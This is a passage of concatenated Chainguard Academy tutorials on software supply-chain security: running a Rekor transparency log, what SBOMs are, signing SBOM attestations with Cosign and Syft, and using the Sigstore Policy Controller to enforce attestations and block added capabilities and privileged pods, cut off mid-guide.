go install ./cmd/rekor-cli ./cmd/rekor-server You can now start the Rekor server with Trillian and can leave this running. $(go env GOPATH)/bin/rekor-server serve --trillian_log_server.port=8091 \ --enable_retrieve_api=false Next, we’ll ensure that Rekor is working correctly. Test Rekor Let’s upload a test artifact to Rekor. Open another terminal session and ensure that you are in your main Rekor directory. cd $HOME/lf-sigstore/rekor Now, let’s upload a test artifact to our Rekor instance. $(go env GOPATH)/bin/rekor-cli upload --artifact tests/test_file.txt \ --public-key tests/test_public_key.key \ --signature tests/test_file.sig \ --rekor_server http://localhost:3000 Your terminal will output that you have created a log entry, and where it’s available. Note that your string will be different than what is indicated below. You can input the URL in a browser of your choice to inspect the resulting JSON. 
Created entry at index 0, available at: http://localhost:3000/api/v1/log/entries/d2f305428d7c222d7b77f56453dd4b6e6851752ecacc78e5992779c8f9b61dd9 Next, we’ll upload the key to our Rekor instance and attach it to the container we built in the Cosign chapter. If you have not created a key or the container, you can do so now, or alternately use a key and software artifact of your choice. $HOME/go/bin/cosign sign \ --key $HOME/cosign.key \ --rekor-url=http://localhost:3000 \ docker-username/hello-container Now you can verify the container against both the mutable OCI attestation and the immutable Rekor record. If you signed your container using Gmail account with Google as the OIDC issuer, you can verify the image with the following command: $HOME/go/bin/cosign verify \ --key $HOME/cosign.pub \ --rekor-url=http://localhost:3000 \ --certificate-identity username@gmail.com \ --certificate-oidc-issuer https://accounts.google.com \ docker-username/hello-container If everything goes well, your resulting output after running the above command should be similar to this: Verification for index.docker.io/docker-username/hello-container:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - The claims were present in the transparency log - The signatures were integrated into the transparency log when the certificate was valid - The signatures were verified against the specified public key - Any certificates were verified against the Fulcio roots. [{"critical":{"identity":{"docker-reference":"index.docker.io/docker-username/hello-container"},"image":{"docker-manifest-digest":"sha256:35b25714b56211d548b97a858a1485b254228fe9889607246e96ed03ed77017d"},"type":"cosign container image signature"},"optional":{"Bundle":{"SignedEntryTimestamp":"MEUCIG...yoIY=","Payload":{"body":"...","integratedTime":1643917737,"logIndex":1,"logID":"4d2e4...97291"}}}}] You can now also review the logs of your Rekor server, which will give you a URL on your localhost for this second log entry (at log entry 1). Once you are done with your Rekor instance, it is safe to exit each of the terminal sessions. Congratulations, you have set up your own Rekor server! --- ### What is an SBOM (software bill of materials)? URL: https://edu.chainguard.dev/open-source/sbom/what-is-an-sbom/ Last Modified: August 4, 2022 Tags: SBOM, Conceptual Today, software products often contain hundreds to thousands of different open source and third-party software components, many of which are unknown to the software operator or end user. Without an organized way of overseeing these components, it is difficult — or even impossible — to identify and respond to security risks associated with these individual components. Even when software distributors identify vulnerabilities and provide patches, software operators may not have a way to identify vulnerable components quickly enough. Or, in the worst case, operators remain entirely unaware of these vulnerabilities, enabling malicious actors to exploit them without their knowledge. A software bill of materials, or an SBOM (pronounced s-bomb), is a key resource for enabling visibility into the different software components of a codebase. Often described as a list of software “ingredients,” an SBOM is a formally structured list of libraries, modules, licensing, and version information that make up any given piece of software. 
An SBOM’s purpose is to enable software operators (or any type of software user) to have a comprehensive view of their codebase so that they can quickly identify software components that have known vulnerabilities, or investigate other tracked features like patch status, supplier, license, or version. SBOM use cases SBOMs are leveraged for a variety of purposes, which will likely continue to evolve as new use cases are identified. Some of the most prominent uses of SBOMs today are: Supply chain security: One of the most common uses of SBOMs is enabling users to check for security vulnerabilities in their codebase’s dependencies or base images. If you learn of a vulnerability in one of the libraries your codebase depends on, you can inspect your SBOM to investigate whether your projects are affected. This security utility is further strengthened when used with VEX, the Vulnerability Exploitability eXchange, which enables you to efficiently filter out security alerts that pose no threat to your codebase. Identify software suppliers: SBOMs can be used to identify the suppliers of software components, such as a software author or the individual or entity repackaging the software for redistribution. Supplier identity is often investigated for legal or procurement reasons and there is an evolving debate about which types of distributors should be formally considered as “suppliers”. Licensing: Software projects often pull from tens or hundreds of dependencies whose different licenses may have different restrictions on the use of the code. Being able to track the licenses of your dependencies allows you to stay informed about legal restrictions and licensing compatibility issues, and help you decide which dependencies work best for your project needs. Automate alerts: The machine readable format of SBOMs enables you to create automated alerts to inform you of important events in your codebase, such as security vulnerabilities, missing components, or incompatible dependency licensing. Make open source funding decisions: By understanding which open source software components are used and how frequently across an organization’s codebases, an organization can make more informed decisions about providing funding to open source projects. Find abandoned dependencies: Assuming that an SBOM’s components contain sufficient information (such as package URLs) to link packages with external data, an SBOM consumer could discover if any of the components are open source projects that are abandoned or archived. The user could then take actions such as forking the abandoned project or removing that project as a dependency. The evolution and growing importance of SBOMs For more than a decade, a variety of communities have worked on standards for generating and sharing SBOMs or SBOM-relevant resources, with institutional support from organizations and government agencies like the Linux Foundation and the Department of Commerce. Discussion of SBOMs grew significantly after the White House signed a cybersecurity executive order in May 2021, which in turn led the National Institute of Standards and Technology (NIST) and Department of Commerce to recommend the requirement of SBOMs for all software used by the federal government. This recommendation was based on the logic that SBOMs, had they been in use, would have helped minimize damage of recent large scale software supply chain security incidents such as SolarWinds. More recently, the Department of Homeland Security demonstrated the U.S. 
government’s sustained interest in SBOMs by supporting and funding the SBOM community’s research and development. Even without requirements, SBOMs are becoming increasingly popular in industry given their utility for managing security risks and licensing, and providing greater visibility into an organization’s codebase. SBOM tools and practices, however, are still maturing and have yet to realize their full potential as an industry practice. While there has been an uptick in the creation and use of SBOMs, many of these SBOMs fail to meet the minimum requirements set forth by the Department of Commerce. For example, in an analysis of 3,000 SBOMs taken from a list of popular Docker containers, Chainguard Labs found that only one percent of SBOMs conformed with the minimum required elements. Nonetheless, proponents of SBOMs (such as Chainguard) remain optimistic about their potential. As industry strengthens SBOM tooling and practices, SBOMs continue to hold great promise for helping secure software supply chains. Open source SBOM tools SBOM creation tools Currently, most SBOMs are generated after the build process using a variety of tools that can scan the software for packages, licensing info, and other information relevant to an SBOM. Syft and Trivy are two popular open source tools for generating SBOMs for containers after the build process, along with bom, an open source tool for creating, viewing, and transforming SBOMs for Kubernetes and other projects. One downside of generating SBOMs after the build process is that scanners typically do not recognize components that are not registered with a package management system. Thus, locally built software components can be missed by the scanner and result in the generation of an SBOM that is missing critical information about the software’s inventory. Ideally, SBOMs should be generated during the build process, which enables a higher level of accuracy given that the SBOM can be generated directly from the software inventory rather than from database records. Though build systems do not typically provide support for this approach, more build tools are beginning to integrate features for generating SBOMs, such as apko, a tool for building and publishing OCI container images. SBOM formats When selecting an SBOM generation tool, it’s important to make sure it supports the format you wish to use. Though there are a variety of available SBOM formats, most SBOMs follow either CycloneDX or SPDX, both of which are approved by the National Telecommunications and Information Administration for fulfilling the executive order’s SBOM requirement. Quality measurement tools An SBOM’s utility is dependent on the quality and comprehensiveness of the information it contains. As noted above, many SBOMs available today fail to meet the NTIA’s minimum requirements. The following tools are helpful for assessing the quality of SBOMs you use or create: The open source SBOM Scorecard, created by eBay, analyzes SPDX and CycloneDX formats according to evolving key fields such as spec compliance, licensing information, and package data. The open source NTIA Conformance Checker analyzes whether an SPDX SBOM meets the NTIA’s minimum elements, such as supplier’s name, dependency relationship, and timestamp. Signing SBOMs Signing your SBOM is an important way of assuring end users that it has not been tampered with by a third party and that it comes from a trusted source (you).
You can learn more about how to use Cosign, an open source tool for signing containers and other software artifacts, to sign your SBOM in our tutorial. Learn more In this guide, you have learned about the purpose of SBOMs and why proponents see them as a critical building block for software supply chain security. You have also learned about key tools and formats used in SBOM production and consumption, and how to measure the quality of the SBOMs you generate or consume. SBOM practices and tooling are actively evolving. To learn more about SBOMs, check out related research by Chainguard Labs, such as:

- What Makes a Good SBOM?
- Are SBOMs Any Good? Preliminary Measurement of the Quality of Open Source Project SBOMs
- Are SBOMs Good Enough for Government Work?

--- ### How to Sign an SBOM with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-an-sbom-with-cosign/ Last Modified: October 10, 2024 Tags: Cosign, Procedural, SBOM An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign, developed as part of the Sigstore project, is a command line utility for signing, verifying, storing, and retrieving software artifacts by interfacing with an OCI (Open Container Initiative) registry. Cosign can be used to sign attestations, which are verifiable assertions or statements about a software artifact. What is an Attestation? An attestation is a cryptographically verifiable statement about a software artifact. Attestations include a subject, a software artifact or artifacts to which the attestation applies, and a predicate, a claim or proposition about the subject. For example, an attestation might assert that a specific container image was built on a specific date using a specific configuration, and that assertion could be cryptographically verified as issuing from a specific organization or entity. Attestations are commonly used for associating useful metadata such as SBOMs or SLSA provenance with a specific artifact such as an OCI container image. In the case of an SBOM (Software Bill of Materials), the attestation proposes that the software artifact contains a specific set of packages. In the case of SLSA provenance, the attestation claims that a specific build environment was used to create the artifact. Attestations verify that a specific trusted entity issued specific metadata about a generated software artifact, and can also indicate that software artifacts and associated documents have not been tampered with. The SLSA project page hosts further detailed information on the attestation model. One common use case for attestations is associating a software artifact, such as an OCI container image, with a software bill of materials (SBOM), an inventory of the components that make up a given software artifact. Increasingly, SBOMs are considered an essential component in maintaining a secure software supply chain. What is a Software Bill of Materials (SBOM)? A Software Bill of Materials (SBOM) is a formally structured list of libraries, modules, licenses, and version information that make up any given piece of software. An SBOM provides a comprehensive view of the components contained in a software artifact, allowing for systematic analysis, investigation, and automation. SBOMs are most useful in identifying known vulnerabilities, surveying licenses for compliance, and making decisions based on project status or supplier trust. Read more about SBOMs on Chainguard Academy.
Including an SBOM with software you ship can help others trust the provenance and contents of the software. Including your SBOM as an attestation verifies that the SBOM was generated by the same trusted organization that created the software artifact, and that neither the artifact nor its associated metadata and documents have been tampered with. In the following, we’ll generate an SBOM and associate it with a specific OCI container using an attestation generated by Cosign. Creating a Demonstration Image Since we’ll be attaching an SBOM to a container image, we’ll first need to create an example image. We’ll base this image on Chainguard’s wolfi-base, and add a single additional package, the venerable cowsay utility that prints a message along with some ASCII art. We then set the entrypoint so that, when the image is run, a message will be displayed. Create a new folder for our Dockerfile build and change your working directory to that folder: mkdir -p ~/example-image && cd ~/example-image Create a new Dockerfile in the folder using Nano or your preferred text editor: nano Dockerfile Paste the following commands into the file: FROM cgr.dev/chainguard/wolfi-base RUN apk add cowsay ENTRYPOINT ["cowsay", "-f", "tux", "I love FOSS!"] Save the file and close Nano by pressing CTRL + X, y, and ENTER in succession. Since we’ll be pushing to a repository on your Docker Hub account, let’s set a variable to your Docker Hub username that we can use in further commands. DH_USERNAME=<your-username> You can find your username on your Docker Hub account page. If you’re logged in on the command line, you can also run the following command to find your username: docker info | sed '/Username:/!d;s/.* //' 2> /dev/null Finally, let’s build and tag the image with: docker build . -t $DH_USERNAME/example-image You can test out the image by running it: docker run $DH_USERNAME/example-image This should display the “I love FOSS!” message along with some ASCII art. Generating an SBOM with Syft Syft is a tool that allows us to create SBOMs. If you don’t already have Syft, use the following instructions to install this utility. How to Install Syft Syft is a CLI tool for generating a Software Bill of Materials (SBOM). It is created and maintained by Anchore. The recommended way to install Syft is by running a provided installation script. We recommend inspecting this script before running it on your local machine. The following command will download the installation script and install Syft to your /usr/local/bin folder. Depending on your machine’s configuration, you may need to add sudo at the beginning of the second line of the below command or otherwise use elevated permissions to complete the installation. curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | \ sh -s -- -b /usr/local/bin Alternately, you can install Syft with Homebrew: brew install syft You can also use Syft directly by pulling and running the official container image from Docker Hub. The following command will pull the Syft container image and use it to scan the official Python container image from Docker Hub: docker run -it anchore/syft:latest python For more on installing Syft, review the project’s installation instructions on GitHub. Once you have Syft installed, you can generate an SBOM with the syft command, passing in the target image as an argument.
For example, the following will use Syft to generate a list of packages present in the official python image on Docker Hub: syft python Now let’s generate an SBOM for example-image, the image we built in the previous section. Run the following Syft command to generate an SBOM in SPDX format: syft $DH_USERNAME/example-image:latest -o spdx-json > example-image.spdx.json What is SPDX? System Package Data Exchange (SPDX) is a file format for representing Software Bills of Materials (SBOMs), or itemized metadata on packages contained in a software artifact. The SPDX specification is based on an open standard and is maintained by the SPDX Project, part of the Linux Foundation. If you take a look at the contents of the file, you will find our installed package, cowsay, represented alongside the other packages already in our base image, wolfi-base. You can also check that cowsay is detected by Syft with the following: syft --quiet $DH_USERNAME/example-image:latest | grep cowsay cowsay 3.04-r0 apk In the next section, we’ll associate this SBOM with our container image using Cosign. Attesting to the SBOM Now that we have our SBOM file, let’s associate it with our image using an attestation. In this attestation, the image will be our subject, and the generated SBOM will serve as our predicate (an assertion about the subject). In this case, we will be attesting that the image contains the packages listed in our SBOM file. Before proceeding, let’s push our image to Docker Hub, since the following commands will refer to the image on the OCI repository. docker push $DH_USERNAME/example-image Our example-image still has attestations derived from our base image, since all Chainguard Containers come with SBOM and SLSA provenance attestations. Let’s remove these attestations with the cosign clean command: cosign clean $DH_USERNAME/example-image We’re now ready to add our attestation. Sigstore recommends referring to the image by digest and not by tag to avoid attesting to the wrong image, and attesting by tag will be removed in a future version of Cosign. The following command will set a variable to the digest of our newly pushed image: DIGEST=$(docker inspect $DH_USERNAME/example-image |jq -c 'first'| jq .RepoDigests | jq -c 'first' | tr -d '"') Alternatively, you can find the digest manually by visiting your repository on Docker Hub. We can now attest using our image as the subject and our generated SBOM as the predicate: cosign attest --type spdxjson \ --predicate example-image.spdx.json \ $DIGEST You will receive the following prompt: Generating ephemeral keys... Retrieving signed certificate... The sigstore service, hosted by sigstore a Series of LF Projects, LLC, is provided pursuant to the Hosted Project Tools Terms of Use, available at https://lfprojects.org/policies/hosted-project-tools-terms-of-use/. Note that if your submission includes personal data associated with this signed artifact, it will be part of an immutable record. This may include the email address associated with the account with which you authenticate your contractual Agreement. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later, and is subject to the Immutable Record notice at https://lfprojects.org/policies/hosted-project-tools-immutable-records/. By typing 'y', you attest that (1) you are not submitting the personal data of any other person; and (2) you understand and agree to the statement and the Agreement terms at the URLs listed above. 
Are you sure you would like to continue? [y/N] Note the warnings — a record of the attestation will be recorded to an immutable log maintained by the Sigstore project. When you’re ready, press y to agree and attest. Retrieving the Signed SBOM Our example-image in our Docker Hub repository should now bear an attached SBOM as an attestation. Let’s confirm that this is the case by accessing the image’s SBOM from the repository using the cosign download attestation command: cosign download attestation \ $DIGEST | \ jq -r .payload | base64 -d \ | jq .predicate This command will download the in-toto attestation envelope using the cosign download attestation command. This envelope contains information on the attestation’s subject (the image) and predicate (a statement about the subject, in this case the generated SBOM). We decode this envelope from base64, an encoding used to reduce information loss while transferring data, then extract the predicate. The result should be our SBOM in SPDX-JSON: { "SPDXID": "SPDXRef-DOCUMENT", "creationInfo": { "created": "2024-10-09T19:16:20Z", "creators": [ "Organization: Anchore, Inc", "Tool: syft-1.14.0" ], "licenseListVersion": "3.25" }, "dataLicense": "CC0-1.0", "documentNamespace": "https://anchore.com/syft/image/$DH_USERNAME/example-image-15096a2c-e277-40f6-bc6e-93c5a4aff24e", "files": [ { "SPDXID": "SPDXRef-File-bin-busybox-b93a85ec4cd132fa", "checksums": [ [...] If we choose, we can further parse this output so we can examine the cowsay package we added in our Dockerfile: cosign download attestation \ $DIGEST | \ jq -r .payload | base64 -d |\ jq .predicate | jq .packages | \ jq '.[] | select(.name == "cowsay")' { "SPDXID": "SPDXRef-Package-apk-cowsay-f6f3edc220b6705a", "copyrightText": "NOASSERTION", "description": "Configurable talking cow (and a few other creatures)", "downloadLocation": "NONE", "externalRefs": [ { "referenceCategory": "SECURITY", "referenceLocator": "cpe:2.3:a:cowsay:cowsay:3.04-r0:*:*:*:*:*:*:*", "referenceType": "cpe23Type" }, { "referenceCategory": "PACKAGE-MANAGER", "referenceLocator": "pkg:apk/wolfi/cowsay@3.04-r0?arch=x86_64&distro=wolfi-20230201", "referenceType": "purl" } ], "filesAnalyzed": true, "licenseConcluded": "NOASSERTION", "licenseDeclared": "GPL-2.0-or-later", "name": "cowsay", "packageVerificationCode": { "packageVerificationCodeValue": "4f82bdba8e1217f8af0abee5cadc9c2387bf4720" }, "sourceInfo": "acquired package info from APK DB: /lib/apk/db/installed", "supplier": "NOASSERTION", "versionInfo": "3.04-r0" } At this point, we’ve attested to the contents of our image with an SBOM and confirmed that the attestation is attached to the image in our Docker Hub repository. In the next section, we’ll learn how to verify the identity of the entity issuing an attestation. Verifying an Attestation Cosign can also be used to verify the identity of the person or entity issuing an attestation. The following assumes you used GitHub to authenticate when attesting in the previous step. 
To verify that an attestation was issued by a specific entity, we use the cosign verify-attestation command, specifying the OIDC issuer and the email address of the identity that signed it: cosign verify-attestation \ --certificate-oidc-issuer=https://github.com/login/oauth \ --type https://spdx.dev/Document \ --certificate-identity=emailaddress@emailprovider.com \ $DIGEST If the identity is successfully verified, an initial message similar to the following is printed to stderr: Verification for $DH_USERNAME/example-image@sha256:545a731e803b917daf44e292b03b427427f8090c4e6c4a704e4c18d56c38539f -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - The code-signing certificate was verified using trusted certificate authority certificates Certificate subject: <you@domain.com> Certificate issuer URL: https://github.com/login/oauth The remainder of the message consists of an in-toto attestation envelope encoded in base64. If you wish, you can retrieve the predicate from this response: cosign verify-attestation \ --certificate-oidc-issuer=https://github.com/login/oauth \ --type https://spdx.dev/Document \ --certificate-identity=emailaddress@emailprovider.com \ $DIGEST | \ jq -r .payload | \ base64 -d | jq .predicate At this point, you have successfully created an image, generated an SBOM for that image, associated the SBOM with the image as an attestation, and verified the identity of the issuer of the attestation. Using this workflow, you can attest to the contents of images you create, allowing others to understand the provenance of software you ship and enabling others to verify that software artifacts and associated documents originate from you. --- ### Enforce SBOM attestation with Policy Controller URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/enforce-sbom-attestation-with-policy-controller/ Last Modified: May 10, 2024 This guide demonstrates how to use the Sigstore Policy Controller to verify image attestations before admitting an image into a Kubernetes cluster. In this guide, you will create a ClusterImagePolicy that checks for the existence of an SBOM attestation attached to a container image, and then test the admission controller by running the registry.enforce.dev/chainguard/node image with SBOM attestations. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly.
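If you have not yet added the opt-in label mentioned in the prerequisites, you can label the default namespace now (a one-line sketch; adjust the namespace name if you are using a different one):

```bash
# Opt the default namespace in to Policy Controller admission checks.
kubectl label namespace default policy.sigstore.dev/include=true
```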
Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image k8s.gcr.io/pause:3.9 test Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image k8s.gcr.io/pause@sha256:7031c1b283388d2c2e09b57badb803c05ebed362dc88d84b480cc47f72a21097 In the next step, you will define a policy that verifies Chainguard Containers have an SBOM attestation and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: # Copyright 2022 Chainguard, Inc. # SPDX-License-Identifier: Apache-2.0 apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: must-have-spdx-cue annotations: catalog.chainguard.dev/title: Enforce SBOM attestation catalog.chainguard.dev/description: Enforce a signed SPDX SBOM attestation from a custom key catalog.chainguard.dev/labels: attestation,cue spec: images: - glob: "**" authorities: - name: my-authority keyless: identities: - issuer: "https://token.actions.githubusercontent.com" subject: "https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main" attestations: - name: must-have-spdx-attestation predicateType: https://spdx.dev/Document policy: type: cue data: | predicateType: "https://spdx.dev/Document" The glob: ** line, working in combination with the authorities and policy sections, will allow any image that has at least an SBOM attestation with predicate type https://spdx.dev/Document to be admitted into your cluster.
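Before applying the policy, you can run the same kind of check from your workstation with Cosign, using the issuer and subject values from the policy above (a sketch; it assumes you can pull the image and that it carries an SPDX attestation signed by that workflow):

```bash
# Ask Cosign for an SPDX SBOM attestation signed by the expected identity.
cosign verify-attestation \
  --type https://spdx.dev/Document \
  --certificate-oidc-issuer https://token.actions.githubusercontent.com \
  --certificate-identity https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \
  registry.enforce.dev/chainguard/node | jq -r .payloadType
```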
Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/must-have-spdx-cue created Now run the k8s.gcr.io/pause:3.9 image, which does not have an SBOM attestation: kubectl run --image k8s.gcr.io/pause:3.9 noattestedimage Since the image does not contain any attached SBOM, you will receive a message that the pod was rejected: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: demo: spec.containers[0].image k8s.gcr.io/pause:3.9 no matching attestations with type https://spdx.dev/Document Finally, run the registry.enforce.dev/chainguard/node image, which contains an SBOM attestation of type https://spdx.dev/Document: kubectl run --image registry.enforce.dev/chainguard/node mysbomattestedimage Since this image has an SBOM attestation, you will receive a message that the pod was created successfully: pod/mysbomattestedimage created Delete the pod once you’re done experimenting with it: kubectl delete pod mysbomattestedimage To learn more about how the Policy Controller uses Cosign to verify and admit images, review the Cosign Sigstore documentation. --- ### Disallowing Non-Default Capabilities URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-non-default-capabilities-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to prevent running containers with extra capabilities. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec, and only allow admission into a cluster if the pod only adds Linux capabilities from a defined set of safe capability flags. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly.
Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that ensures pods only run with safe capabilities and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: non-default-capabilities-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | #Allowed: "AUDIT_WRITE" | "CHOWN" | "DAC_OVERRIDE" | "FOWNER" | "FSETID" | "KILL" | "MKNOD" | "NET_BIND_SERVICE" | "SETFCAP" | "SETGID" | "SETPCAP" | "SETUID" | "SYS_CHROOT" spec: { initContainers: [...{ securityContext: { capabilities: { add: [...#Allowed] } } }] containers: [...{ securityContext: { capabilities: { add: [...#Allowed] } } }] ephemeralContainers: [...{ securityContext: { capabilities: { add: [...#Allowed] } } }] } The Policy Controller will check each type of container’s definition (initContainers, containers, and ephemeralContainers) in a pod spec for any added capabilities. The controller will only admit a pod if the added capabilities are in the #Allowed set. The set of allowed capabilities is defined in this portion of the CUE policy and can be added to or changed to match your specific workload’s needs: #Allowed: "AUDIT_WRITE" | "CHOWN" | . . . Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/non-default-capabilities-cue Next you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting pods running with privileges, you’ll create a pod that runs without unnecessary capabilities and admit it into your cluster. Step 3 — Testing a ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. 
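Before testing, you can confirm that the policy you applied in the previous step is registered in the cluster (a quick sanity check):

```bash
# List the ClusterImagePolicy resources known to the Policy Controller.
kubectl get clusterimagepolicy
```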
Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that runs with elevated privileges: apiVersion: v1 kind: Pod metadata: name: yolo spec: containers: - name: "app" image: docker.io/ubuntu securityContext: capabilities: add: # Violates restricted-capabilities - NET_ADMIN drop: - ALL Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: non-default-capabilities-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:2adf22367284330af9f832ffefb717c78239f6251d9d0f58de50b86229ed1427 failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.containers.0.securityContext.capabilities.add.0: 12 errors in empty disjunction: (and 12 more errors) The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and remove or edit the add portion of the capabilities section. If there are no extra capabilities then the section should look like the following: capabilities: drop: - ALL Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the pod spec now ensures the container does not add any extra capabilities, or only adds those from the #Allowed set, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod yolo --- ### Disallowing Privileged Pods URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-privileged-containers-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to prevent running containers with elevated privileges. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec, and only allow admission into a cluster if the pod is running without the privileged: true setting. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly.
Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that only admits unprivileged pods and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: privileged-containers-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | spec: { initContainers: [...{ securityContext: { privileged: false } }] containers: [...{ securityContext: { privileged: false } }] ephemeralContainers: [...{ securityContext: { privileged: false } }] } This policy will ensure that any kind of container in a pod spec will only be admitted if the privileged setting is not set, or is set to false. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/privileged-containers-cue Next you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting 